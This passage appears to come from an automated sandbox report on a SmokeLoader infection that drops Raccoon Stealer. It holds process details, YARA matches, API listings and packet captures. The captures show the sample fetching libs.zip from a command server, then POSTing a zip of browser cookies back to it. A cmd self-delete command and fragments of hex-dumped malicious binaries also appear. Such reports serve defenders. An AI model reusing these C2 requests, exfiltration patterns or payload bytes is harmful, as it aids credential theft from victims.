Sep 13, 2020 20:55:06.730808973 CEST	858	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 13, 2020 20:55:06.730818987 CEST	860	IN	Data Raw: c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc ff ff 83 ec 0c e9 d9 fe ff ff 89 7c 24 08 c7 44 24 04 02 00 00 00 89 34 24 e8 d7 1b 09 00 83 ec 0c 89 c5 e9 bb fe ff ff 8d b6 00 00 00 Data Ascii: D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$a$daRRt$a$aU
Sep 13, 2020 20:55:06.730829954 CEST	861	IN	Data Raw: 00 89 ca 79 3f 55 80 f9 5b b1 5d 0f 44 d1 b9 01 00 00 00 89 e5 57 56 53 be 01 00 00 00 8a 1c 08 8d 7e ff 38 da 75 0d 3a 54 08 01 75 0f 88 54 30 ff 41 eb 04 88 5c 30 ff 41 46 eb e1 5b c6 04 38 00 5e 5f 5d c3 55 89 e5 57 56 89 c6 53 31 db 0f b6 0c Data Ascii: y?U[]DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1KtBOG1x4`a`a)t
Sep 13, 2020 20:55:06.730879068 CEST	863	IN	Data Raw: d2 83 fa 00 77 34 83 f8 07 76 ef eb 2d 3d ff 00 00 00 76 1f 0f ac d0 04 83 c1 28 c1 ea 04 83 fa 00 77 f1 eb e8 83 f8 0f 76 10 0f ac d0 01 83 c1 0a d1 ea 83 fa 00 77 f2 eb eb 83 e0 07 66 8b 84 00 ec 2f ea 61 8d 4c 01 f6 89 c8 5d c3 85 c0 74 2b 55 Data Ascii: w4v-=v(wvwf/aL]t+UVSX94uDL0911[^]U1@Ht`aiy7]UWVSSXtM1M6X0Xp1tCNt
Sep 13, 2020 20:55:06.730897903 CEST	864	IN	Data Raw: 2c 5d c3 55 89 e5 8b 45 08 5d 8b 40 30 c3 55 31 d2 89 e5 57 56 8b 4d 08 53 8b 45 10 8b 75 0c 8b 5d 14 8b 79 34 f7 f7 8b 41 38 8d 04 90 8b 10 39 d6 74 05 8d 42 10 eb f5 8b 56 10 89 10 31 d2 89 d8 f7 f7 8b 41 38 3b 59 24 89 5e 08 8d 04 90 8b 10 89 Data Ascii: ,]UE]@0U1WVMSEu]y4A89tBV1A8;Y$^V0vY$[^_]UWVSM2xur9-\|;]w&9\|;]sA@tQQZuBE[^_]UVS@tMEXCtS
Sep 13, 2020 20:55:06.730906010 CEST	865	IN	Data Raw: 16 80 00 eb 07 8b 5b 0c eb d4 31 c0 5a 5b 5e 5f 5d c3 80 78 44 00 78 32 55 89 e5 56 31 f6 53 89 c3 0f be 43 44 39 c6 7d 0f 8b 44 b3 78 46 8b 40 48 e8 38 fd ff ff eb e9 8b 43 74 8b 40 48 e8 2b fd ff ff c6 43 44 ff 5b 5e 5d c3 83 fa 01 76 42 55 b9 Data Ascii: [1Z[^_]xDx2UV1SCD9}DxF@H8Ct@H+CD[^]vBUWVS@$11xC[1av ^_]PA9D1UWVS@US4Ez$A+E1CU9LfQQ+UfQ^_[^_]UWVS$E
Sep 13, 2020 20:55:06.730915070 CEST	867	IN	Data Raw: 06 dd d8 eb 02 dd d8 c9 c3 55 89 c2 89 e5 83 ec 18 0f b6 52 0a 8b 48 0c 8b 40 10 c7 45 f8 00 00 00 00 c7 45 fc 00 00 00 00 89 14 24 8d 55 f8 e8 9f eb ff ff 8b 45 f8 8b 55 fc c9 c3 55 89 e5 57 56 53 89 c3 83 ec 24 dd 00 dd 14 24 dd 5d d8 e8 5e ff Data Ascii: URH@EE$UEUUWVS$$]^EUmEz,u*rwCSf%>fC$[^_]UHt@Pt@ ;Pl1]HlU~kHhfQ]USy@lP<a{Qu
Sep 13, 2020 20:55:06.730982065 CEST	868	IN	Data Raw: 10 00 74 02 8b 02 5d c3 55 89 e5 57 56 53 89 d6 89 cb 8d 55 e0 8d 4d e4 89 c7 83 ec 4c c7 45 e0 00 00 00 00 c7 45 e4 00 00 00 00 8b 03 89 55 d0 89 4d d4 89 44 24 14 8d 43 08 89 44 24 10 8b 06 89 4c 24 04 89 3c 24 89 44 24 0c 8d 46 08 89 44 24 08 Data Ascii: t]UWVSUMLEEUMD$CD$L$<$D$FD$W MU2FVt^CSEtsEL[^_]USEXHEX1[]UE8uURP&1]UWVS1Mt<.tCt&\$
Sep 13, 2020 20:55:06.731152058 CEST	870	IN	Data Raw: e8 9e e0 ff ff 85 c0 8b 4d ec 75 0a 8b 45 f0 89 fa e8 ef fe ff ff 46 eb d0 83 c4 10 5b 5e 5f 5d c3 55 89 e5 53 8b 4d 0c 8b 45 08 80 39 9e 75 15 8b 50 18 8b 59 2c 39 5a 0c 75 0a 8b 00 83 c1 2c e8 c0 fe ff ff 31 c0 5b 5d c3 55 89 e5 53 83 ec 14 8b Data Ascii: MuEF[^_]USME9uPY,9Zu,1[]US]C$E18E<C$1[]UWVSU1;s}EOEtCtFEUC@t0Ea{
Sep 13, 2020 20:55:06.754230022 CEST	871	IN	Data Raw: 3c 98 00 79 0e 0f bf 46 28 39 d8 75 30 83 7d 08 00 74 2a 89 d8 c1 e0 04 03 46 04 83 7d f0 00 74 16 8b 55 f0 8b 00 89 4d e0 e8 f5 da ff ff 85 c0 8b 4d e0 75 08 eb 10 f6 40 0f 01 75 0a 43 eb b7 41 eb 9f 31 c0 eb 05 b8 01 00 00 00 83 c4 14 5b 5e 5f Data Ascii: <yF(9u0}t*F}tUMMu@uCA1[^_]UWVS,$`aPdax&M}9yu}5`aJ1$,[^_]UWVS1<>$M a aU

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49723	47.245.136.23	80	C:\Users\user\AppData\Local\Temp\3BD3.exe

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2020 20:55:12.462973118 CEST	1793	OUT	GET /gate/libs.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: chinadevmonster.top Connection: Keep-Alive
Sep 13, 2020 20:55:12.520364046 CEST	1794	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 13 Sep 2020 18:55:12 GMT Content-Type: application/zip Content-Length: 2828315 Connection: close Last-Modified: Wed, 03 Apr 2019 07:47:18 GMT ETag: "5ca46506-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 78 94 da 61 fb 01 40 e9 d2 80 fd c0 27 00 d7 18 c1 c5 72 4d 82 ea 19 92 5f b0 99 a4 31 f5 a5 cb a1 91 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@xa@'rM_1
Sep 13, 2020 20:55:12.520382881 CEST	1796	IN	Data Raw: 96 1b 9a 95 f5 ee 31 e8 34 b5 7e b8 f9 f2 f5 6e 00 c5 04 a0 b8 45 ec 21 e8 9c 06 80 2f 30 d6 5e 83 e8 4e a8 1b 1c ea e7 1c 31 9d 1f 8c 6b 9a 2a 39 06 7f 8b c0 f5 6b 83 2f 08 88 a8 23 e5 6f d8 0f bc 0a 28 b2 57 42 fb 0e 4b 53 54 8f b3 7c b3 28 65 Data Ascii: 14~nE!/0^N1k9k/#o(WBKST\|(e9~V`PJ16}"LV@!@2 c54 I8 mG;C^W,E+fY52u`E9IbN,>I[4\&K9Izlu
Sep 13, 2020 20:55:12.520498037 CEST	1797	IN	Data Raw: 0a 06 58 e7 39 9d fd 48 ff e0 82 53 59 b5 2d 3c 25 9d d7 c6 5f 06 d9 8d 46 68 85 19 d9 2c af 85 90 ff fa 64 a2 5e b5 27 45 b0 50 08 70 c3 7a 6b 67 2c 7c 73 20 ba 39 ab fb 9f 16 79 20 4b 2b ec bc 72 96 e0 b0 ef 37 7f e3 f0 1c 4b 7f e5 97 6f e4 7f Data Ascii: X9HSY-<%_Fh,d^'EPpzkg,\|s 9y K+r7KoW'_nmR{](8.A=N?3L0eVZ['!Qmr4i@;n{eR% {Cm0d E(7JlVV>\|%[Fi6}0"8]1
Sep 13, 2020 20:55:12.520526886 CEST	1799	IN	Data Raw: 8b fa 51 fd b6 93 34 06 12 6b 13 e1 db 91 88 c3 8b d4 80 de 95 c1 e8 26 b3 ba 4a ef c7 2a bd 1f ab f4 7e b4 44 37 8a 91 55 5f 60 47 9e 8c 5f 69 3f 70 81 7c 08 bb 2d c9 6c 9e 43 18 41 f8 b1 6d c2 0e db c4 3b 6c 53 55 f9 df 76 c5 bf 62 84 fc 67 82 Data Ascii: Q4k&J*~D7U_`G_i?p\|-lCAm;lSUvbgF^>BYDQ_2)<\|Z,`T_,!RLljLWkQ`uLm<pqs@4hVWV#]'FV~!bW~lkW+6
Sep 13, 2020 20:55:12.520541906 CEST	1800	IN	Data Raw: d0 a2 62 dd 73 0e bf d8 b5 dc 2b 8f 17 ec bc 24 64 d6 72 9f 82 ce f6 85 16 84 4c 2d f7 23 f9 e6 1e a4 d1 02 ba 21 e9 02 4a 6b 81 eb 30 96 a0 40 89 35 6e 05 ef 6a ad 29 74 97 79 86 a5 ea 4a f9 b3 82 b6 df af 53 7b bb 07 72 42 26 4b 37 da 65 ce ea Data Ascii: bs+$drL-#!Jk0@5nj)tyJS{rB&K7e`X9<Xs^ YGj)KoQFC5m\fu6-dg~ DfeifCJ(Kf_fx#*^yxN2m
Sep 13, 2020 20:55:12.520554066 CEST	1801	IN	Data Raw: 75 c5 de 15 51 b1 1f 94 dc 1a 34 71 25 94 bd a8 16 00 f1 f9 a2 7b 51 8e 47 99 b9 7d 94 9a c4 1b 92 23 ef b0 09 e1 0c 6d b3 2d 9e d1 82 66 ea 00 6b 9d 8a 78 88 01 0a fb 81 3f ed 45 05 2e 3c 65 94 fa c6 1c ce 70 c5 48 ab 96 bf 8d 8b 11 5a a8 50 d9 Data Ascii: uQ4q%{QG}#m-fkx?E.<epHZP[7\Y0**kG_`~l}/'-4mDMIV]Bx=\|)T!%(rjU4&q-{l $rhYmlDmT>`mWW^o]q
Sep 13, 2020 20:55:12.520565033 CEST	1803	IN	Data Raw: ba b4 31 28 e9 a6 ee 36 90 59 a6 9e 67 92 6f ec c1 f9 bf 73 14 64 b3 ed 49 12 6e 84 7e 2d 7b 18 a7 8b f0 ca 90 09 ba 06 d9 32 e7 45 cb 03 ac 1c 57 16 e0 d6 55 4a a6 fb f0 9c b2 87 51 26 0d cf 2c 7d 18 ad 5f d2 d4 00 0b 42 7e 6e d8 c7 8c 93 95 87 Data Ascii: 1(6YgosdIn~-{2EWUJQ&,}_B~nqdc:T$FEa}x$Mx;c2$>K6$JEec7m?y`aGY^G(%>P+PFVWUrLwiiC4t+&ixX}T
Sep 13, 2020 20:55:12.520693064 CEST	1804	IN	Data Raw: b1 9a a4 5b 1b d0 4f 20 08 08 c5 d9 73 09 cc fe c8 da 7f 8e fe 61 e5 67 ed 1d b8 a0 a1 5e 44 02 e3 2e 9b 20 65 8e 7a 73 c5 f0 7c 92 ea 2f ed f2 e6 fe dc 14 9e 1d 12 ec cf c5 e4 01 98 c0 b6 db b4 ed 8e 3a d6 f7 16 b1 4c 05 b7 97 48 8b 48 e2 98 2b Data Ascii: [O sag^D. ezs\|/:LHH+3kP^1GjbKfo<c83`z_enlIk>+?b_{HC[TGN]\| /[E`'Q.+8C\XZGFYRQh;!.
Sep 13, 2020 20:55:12.520713091 CEST	1805	IN	Data Raw: 75 26 d4 b1 64 5d b8 af 34 91 3e 3b 00 cc 36 f6 d2 6b d4 56 28 b1 0c 9d eb b8 97 93 73 a1 ee d2 54 de 66 0b 5f 1c 60 bf 7a 0d 4d 05 da 2e 7b 48 68 99 36 90 ea 56 18 2b e6 a4 c9 0b 58 9e bc 43 bc 54 b5 6e b5 77 1e 0e e7 b4 df 6d b2 4a b8 b2 d2 d8 Data Ascii: u&d]4>;6kV(sTf_`zM.{Hh6V+XCTnwmJ}OZa5O95_*$D=qOAvOnVZLjVk.h0Pz1flbM8LGCDhJcf=cjcR!D2jYnx4\|wzGsD
Sep 13, 2020 20:55:12.520744085 CEST	1807	IN	Data Raw: 03 19 9e 00 3a 72 03 a6 e5 98 45 81 d6 7a 0b 40 9c 02 50 d8 f5 58 ca 09 65 36 6e 59 06 9e d2 22 08 42 aa c5 5d b8 ff b4 cb eb 8c 54 99 00 bf 91 2a b3 bc cb 29 6c cf 45 fc 56 59 00 bd 3e b6 f7 38 29 68 b8 18 0f 85 6b 52 02 ca 47 47 c9 3b 8f a3 3d Data Ascii: :rEz@PXe6nY"B]T*)lEVY>8)hkRGG;=!n{r%/C(]>-O&QOYl`)4U4wGZ9m@g9>?S{_>qgSrm8@NVA
Sep 13, 2020 20:55:12.544163942 CEST	1808	IN	Data Raw: 24 dc 82 9c 0b b3 a4 e2 15 51 6d cc d4 72 fb 17 a0 2d 38 df 50 d5 48 82 13 d8 2f 60 9a 0a 99 d5 61 d7 e1 b2 5a eb 86 90 45 93 f2 ec 1e f4 eb d3 ea 9d fa fe 36 7b c7 9f 38 55 83 ce 9e ed 67 bf fe 13 ca 92 66 d0 43 bd b8 05 d3 12 8c 67 d3 fa 13 2a Data Ascii: $Qmr-8PH/`aZE6{8UgfCg~#Q7f<?{%DO[m6C77 -A\#o"A91.@%Lm's}xh1y_gQk>t[>:ujRVNL4?1IWhY7k8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49724	47.245.136.23	80	C:\Users\user\AppData\Local\Temp\3BD3.exe

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2020 20:55:17.872457027 CEST	4683	OUT	POST /file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c2192b8881e9e86fdae59338948668354bcd5e2d&callback=http://chinadevmonster.top/gate HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=4k683b59nd0j798043458n Content-Length: 2211 Host: chinadevmonster.top
Sep 13, 2020 20:55:17.872736931 CEST	4685	OUT	Data Raw: d0 13 79 0d 0a 2d 2d 34 6b 36 38 33 62 35 39 6e 64 30 6a 37 39 38 30 34 33 34 35 38 6e 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 Data Ascii: y--4k683b59nd0j798043458ncontent-disposition: form-data; name="file"; filename="data.zip"Content-Type: application/octet-streamPK-Qd[F*browsers/cookies/Google Chrome_Default.txtUT.^_.^_.^_mr0qO
Sep 13, 2020 20:55:17.872745991 CEST	4685	OUT	Data Raw: 11 8e ef 38 1e 07 1d 08 78 ec 48 a9 57 c1 4d 02 51 b7 9f 32 63 de 94 ce 11 21 1d 72 83 61 75 bb 76 cc df 4d cd 37 30 96 2b a5 37 ac 16 4a 26 27 63 7b e1 03 93 eb 86 ad 79 02 d7 72 5d 0a 53 fc c3 58 88 0d 7f 52 12 19 76 04 85 36 27 c2 78 9a 40 4c Data Ascii: 8xHWMQ2c!rauvM70+7J&'c{yr]SXRv6'x@L1.qIp=;bOKoxj&K&s"BIzS55l>R?di!-C\rm>=x\S&S<)iGtV$CY/8mXu\|w`fct
Sep 13, 2020 20:55:18.051340103 CEST	4686	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 13 Sep 2020 18:55:18 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Data Raw: 39 0d 0a 22 73 75 63 63 65 73 73 22 0d 0a 30 0d 0a 0d 0a Data Ascii: 9"success"0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Sep 13, 2020 20:54:49.134413958 CEST	195.201.225.248	443	192.168.2.3	49720	CN=telecut.in CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Aug 20 03:22:09 CEST 2020 Thu Mar 17 17:40:46 CET 2016	Wed Nov 18 02:22:09 CET 2020 Wed Mar 17 17:40:46 CET 2021
Sep 13, 2020 20:54:49.134413958 CEST	195.201.225.248	443	192.168.2.3	49720	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: y98WYYcJ2U.exe PID: 5008 Parent PID: 3196

General

Start time:	20:54:01
Start date:	13/09/2020
Path:	C:\Users\user\Desktop\y98WYYcJ2U.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\y98WYYcJ2U.exe'
Imagebase:	0x400000
File size:	129024 bytes
MD5 hash:	18B04E2FD804D553D9A35E088193DEA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 2460 Parent PID: 5008

General

Start time:	20:54:10
Start date:	13/09/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff7cde60000
File size:	3932672 bytes
MD5 hash:	E4A81EDDFF8B844D85C8B45354E4144E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cwfbibg PID: 4600 Parent PID: 64

General

Start time:	20:54:41
Start date:	13/09/2020
Path:	C:\Users\user\AppData\Roaming\cwfbibg
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\cwfbibg
Imagebase:	0x400000
File size:	129024 bytes
MD5 hash:	18B04E2FD804D553D9A35E088193DEA7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 3BD3.exe PID: 4680 Parent PID: 2460

General

Start time:	20:54:41
Start date:	13/09/2020
Path:	C:\Users\user\AppData\Local\Temp\3BD3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3BD3.exe
Imagebase:	0x400000
File size:	415744 bytes
MD5 hash:	8576CCC1310EA39D4AC4B642C7700F91
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 48F3.exe PID: 1300 Parent PID: 2460

General

Start time:	20:54:45
Start date:	13/09/2020
Path:	C:\Users\user\AppData\Local\Temp\48F3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\48F3.exe
Imagebase:	0x400000
File size:	200192 bytes
MD5 hash:	1C886F74C9051CE8BE91FEC2083744F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4440 Parent PID: 4680

General

Start time:	20:55:17
Start date:	13/09/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\3BD3.exe'
Imagebase:	0xdf0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 2392 Parent PID: 4440

General

Start time:	20:55:19
Start date:	13/09/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff623600000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: timeout.exe PID: 4856 Parent PID: 4440

General

Start time:	20:55:20
Start date:	13/09/2020
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 10 /NOBREAK
Imagebase:	0xac0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: msiexec.exe PID: 2732 Parent PID: 1300

General

Start time:	20:55:54
Start date:	13/09/2020
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe
Imagebase:	0x290000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: y98WYYcJ2U.exe PID: 5008 Parent PID: 3196 y98WYYcJ2U.exeCOMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	25.9%
Signature Coverage:	59.3%
Total number of Nodes:	81
Total number of Limit Nodes:	13

Executed Functions

Function 00415AB0, Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 330
stringpipetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(005089E8), ref: 00415AC4
DisconnectNamedPipe.KERNEL32(00000000), ref: 00415B8E
SetLocalTime.KERNEL32(00000000), ref: 00415B96
GetTickCount.KERNELBASE ref: 00415B9C
GetPrivateProfileStructA.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00415BCD
ScrollConsoleScreenBufferW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415BDC
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415C44
GetLastError.KERNEL32(?,00000000), ref: 00415CCA
GetModuleHandleA.KERNELBASE(0041AC60), ref: 00415CDE

Strings

pubiyet, xrefs: 00415ADB

Memory Dump Source

